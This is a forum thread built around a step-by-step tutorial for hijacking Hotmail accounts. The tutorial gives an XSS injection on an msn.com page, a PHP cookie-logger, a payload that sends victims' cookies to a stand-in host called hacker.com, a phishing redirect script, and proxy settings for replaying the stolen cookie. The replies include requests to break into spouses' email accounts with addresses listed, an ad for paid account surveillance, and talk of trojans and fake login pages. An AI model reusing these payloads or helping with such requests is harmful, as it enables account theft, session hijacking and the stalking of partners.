How to steal someones msn cookie.

[carlo]

How does it work
One of the following things is needed to login into Hotmail:
When you know his/her e-mail address and password you can login with his username and password on [url]http://www.hotmail.com/[/url]
When you know his/her account information like country and zip-code, and you are able to answer his/her secret question. In this case You can reset his/her password, and login just like option 1, with a new password.
When you have access to his alternate e-mail address, you could send a password reset e-mail message to that account to reset his/her password.
When you have his/her 'cookie' for passport.net or hotmail.msn.com you can 'fake' his/her cookie, and make hotmail believe you are already logged in as this user.
I am using Option 4 to make my exploit work. This exploit is using the cookie from hotmail.msn.com to access the 'victims' inbox. Because the cookie is not limited to the domain hotmail.msn.com, I can also use an exploit on the site msn.com to steal the cookie from the victim. When I searched msn.com for an exploit called "HTML Injection" or "Cross Site Scripting" (XSS), it took me about 30 minutes to find one. With this exploit type I'm able to insert additional pieces of html or javascript into a page of msn.com. When I insert the code: <SCRIPT>alert(document.cookie)</SCRIPT>, the user will see a message box just like the picture below when he visits that site.



The real HTML injection example with popup can be viewed at:
http://ilovemessenger.msn.com/?mkt=nl-nl');alert(document.cookie);escape('

With the text you can see in the "alert message-box" above, everybody with some knowledge is able to access my inbox. This text is send by my browser to hotmail every time I visit a site with the domain "msn.com". This method is used so hotmail knows I am still logged in. The text in the popup is called a "cookie". A trick used by attackers is to fake somebody else's cookie. I will explain one easy method, although there are different ways of doing it. I can fake cookies with a helper program called "Proxomitron". Proxomitron acts like a proxy server with the option to change, fake or block html headers. Cookie-text, like the text in the popup, is send by the browser invisibly in an html-header called "cookie". Because Proxomitron is able to fake headers, this program is very useful to me.

I will explain later how proxomitron must be configured to fake cookies.

How does the attacker get the cookie? Showing a popup to the user with his cookie information does not help the attacker. The attacker wants the text now shown in the popup-box. To log cookies the hacker needs to create a internet-page with PHP or ASP. This is to log some text to a log file on a webserver. I've created a simple PHP script that is able to log text to a log file. I've named this file "cookielogger.php" and its content looks like this:
<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Error: Unable to write to the log file";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Error while writing to log file";
exit;
}
}
echo "Successfully wrote a string to the log file";
fclose($handle);
exit;
}
echo "nothing to write to the log file";
exit;
?>

I uploaded this file to a webserver. As example I'll use the fake internet site [url]http://www.hacker.com/[/url]. To test the PHP script I'll go to [url]http://www.hacker.com/cookielogger.php?cookie=test[/url]. I can see the text "Successfully wrote a string to the log file". When I'm now browsing to [url]http://www.hacker.com/logfile.txt[/url] I can see the text "test".
When I go to [url]http://www.hacker.com/cookielogger.php?cookie=this[/url] text is being logged, the text "this text is being logged" will be appended to the log file: [url]http://www.hacker.com/logfile.txt[/url]

Cookielogger.php is now ready to log text strings, so it's also ready to log cookies. I use the Cross Site Scripting exploit to inject a code that will redirect the user to [url]http://www.hacker.com/cookielogger.php[/url] with the argument "cookie" filled with the user's cookie. So when the user visits the msn site with added code, he will be redirected to [url]http://www.hacker.com/cookielogger.php?cookie=hiscookie[/url] and the hacker can read his cookie information at the site [url]http://www.hacker.com/logfile.txt[/url] because "hiscookie" is now logged to a textfile the hacker can see. the code I'm inserting in msn.com will look like this:
<SCRIPT>location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

See the two printscreens below of the results with the cookielogger. Remember "www.hacker.com" is not really used, its just an example.





The real HTML injection example to log the cookie is:
http://ilovemessenger.msn.com/?mkt=nl-nl');location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie);escape('

Okay, the exploit is ready to go. We could send the link above to the victim in the hope he clicks the link. But there aren't many people who go to a site like "ilovemessenger.msn.com". Also when the users sees something like "document.cookie" in the url he'll probably think twice before clicking it.

When we create a new php page called "redirect.php" with the following content:
<?php
header("Location: http://ilovemessenger.msn.com/?mkt=nl-nl');location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie);escape('");
exit;
?>

and place this file online on [url]http://www.hacker.com/redirect.php[/url]. Now when we send the victim an email with this link and he clicks on it he will be redirected to the ilovemessenger site plus exploit, here he will be redirected to hacker.com/cookielogger.php with his cookie of msn.com being logged in the log file.

When these actions are completed you are ready to start exploiting the victim. If anyone really would try to break into somebody's hotmail account he also would change cookielogger.php to redirect on, or to show an innocent message, so that the user wouldn't notice that his cookie was logged.

When a malicious hacker sends an e-mail containing the link to the redirect script and the victim opens his new e-mail message he will see something like this:



When the victim clicks the text "click this link" the exploit will come in motion. In real life there are tons of methods of persuading the victim to click on a link. The hacker is patiently waiting for a new entry in the file [url]http://www.hacker.com/logfile.txt[/url]. When the user finally clicks the link and the hacker notices extra text in the log file the fun can start. When the victim is fallen for your trick, the log file looks like this:



Now the hacker has stolen the cookie of the victim, the hacker can proceed in faking his cookie when entering hotmail. Somewhere at the start of this explanation I talked about "Proxomitron" to fake cookies. I will now explain how to make the settings to fake this cookie.

Proxomitron looks like this:



Just place a 'v' before "Outgoing Header Filters" because that's what we want to do. We want to send the users cookie to the web server as it is or own cookie. Press the button "Headers" to create a new header to fake the cookie.



In the new window, fill in these values:
HTTP Header: "Cookie: a description"
URL Match: ""
Header Value Match: "*"
Replacement test: the users cookie



Apply the new header by putting a 'v' before the new header in the "Out" column and press apply to save the changes.



Proxomitron is now ready for faking the cookie. Now setting up your browser. You need to set your browser to use a proxy-server. It differs per browser how to make that setting.
In Internet Explorer: "Tools -> Internet Options... -> Connections -> LAN Settings -> Proxy server"
In Mozilla Firefox: "Tools -> General -> Connection Settings -> Manual proxy configuration"

Set the Address to "127.0.0.1" (your own pc) and as port : "8080" (the port of Proxomitron proxy server)

When your browser is setup to use your own proxy server, you can go to the following url :
[url]http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes[/url]

When successful you can now see the inbox of the victims mail box.

Written by Alex de Vries. Edited By carlo

[jaybo2502]

Hey can you get a netzero email password? The account is [email]rgself2@netzero.net[/email] This a matter of my wife, hope you understand. Jaybo2502 [email]jayjones4@hotmail.com[/email] . JJ

[nkunovski]

please can every one give password of my wife who lives in ecuador she wants to take my son illegaly to usa without my permission.hope that u understand me. her email is [email]mariuxih@hotmail.com[/email]

[Salsero]

Hi, Carlo...

Do you still have the your original document on "how to hack hotmail"?
I would like to see the pictures...

It is such a good article, by the way...
Thank you.

From México, Salsero...

[Unknown]

The original can be found here: [url]http://www.net-force.nl/files/articles/hotmail_xss/[/url]

[natasha]

Hi dear

The method u mentioned is really great but ur php redirect script doesnot log cookies

The script itself works fine when i tested it but it still doesnt log cookies.

It also can redirect to another site

[invaderzgroup]

For remote servalence go [URL=http://www.geocities.com/invaderzgroup/index.html]here[/URL] Cheap Prices. Includes all passwords and chat logs for only £50!!

invaderz Group.

[carlo]

Moderators please dont delete the above. I want to see how this website does. Im conducting a survey to see how many people use this service.

Thanks

Carlo

[Gaudz1]

Not quite sure how do do this, but can you still hack if you do not know the secret question. Is a keylogger, best for this???

[Phazex86]

Carlo,

Good job with this exploit, although I think that these users might like to know how to get their victim's password. Most people who are posting are asking you to get them 'their wife's' account password, although your exploit requires them to already have it.

When you know his/her e-mail address and password you can login

.

I think that these users would appreciate a tutorial on exactly how to get someones hotmail password. Although, if these users who claim that the have a wife are really concerned, then they would follow invaderzgroup suggestion and get professional help.

Happy exploiting,
Phaze

[carlo]

I agree.

As i have said before there are other ways like fake pages and trojans. Soon im going to post various ideas to hack hotmail.

Thanks for the tip

carlo

[Beramode]

I agree, are there other exploits that are not required that you have the user's password? I understand usually this is something people want due to sabotage of a person they don't like, but as someone who's studying programming, it's nice to have some knowledge outside of the boundaries.. Something I could perhaps just test out on my own emails. Of course more from the perspective of not being on the computer of ther person whose email address you're trying to hack. Nyeh, makes no sense, though I'm not sure that matters, really.. xD I'm really interested in what other information you have to provide on the topic. :O Also, what of exploits for yahoo email addresses?

<3 Yuri.

[MrMicrosoft]

Dam! Carlo i feel so sorry for you, you give this great idea on 'How to hack Hotmail' and these noob leechers just sit there replying "hey can u get me the password to this acc." "i want to know my gf's pw can u get it please?"


Fkn Noob leechers get off ur fat ass and read what he has just worte FOR YOU and stop begging like a little girl!

Mr.Microsoft

[carlo]

(To the above) it is only illegal to practise this. Also that hack no longer works.

Well done for pointing this out by the way. I also get tired of people asking me to hack other peoples accounts.

[c0cky]

why is it required to run through the i.love.messenger page, if the link was directly from somebodys email acount would the cookies would still be there to be logged?

i realise im not right, but can you explain why thanks